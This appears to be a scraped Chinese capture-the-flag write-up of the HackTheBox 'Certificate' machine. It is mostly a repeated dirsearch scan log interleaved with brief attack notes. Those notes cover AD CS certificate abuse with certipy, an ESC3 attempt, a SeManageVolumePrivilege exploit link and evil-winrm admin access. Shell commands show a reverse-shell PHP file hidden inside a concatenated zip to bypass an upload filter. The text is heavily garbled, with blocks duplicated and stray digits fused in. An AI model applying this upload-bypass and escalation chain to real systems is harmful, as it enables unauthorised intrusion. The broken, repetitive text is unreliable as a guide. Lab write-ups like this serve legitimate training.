/examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/4在bloodhound导入zip文件
Lion属于DOMAIN CRA MANAGERS组,该组是用来颁发和撤销证书的。
尝试certipy来操纵
certipy
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/5ESC3攻击,但是这里失败了
Ryan.k用户属于DOMAIN STORAGE MANAGERS,可以针对这个用户进行ESC3攻击
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/6➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/7shell -> Ryan.k
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/8➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/9SeManageVolumePrivilege权限 ---> https://github.com/CsEnox/SeManageVolumeExploit
➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip0➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip1伪造
➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip2Evil-winrm -> administrator
➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip3推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...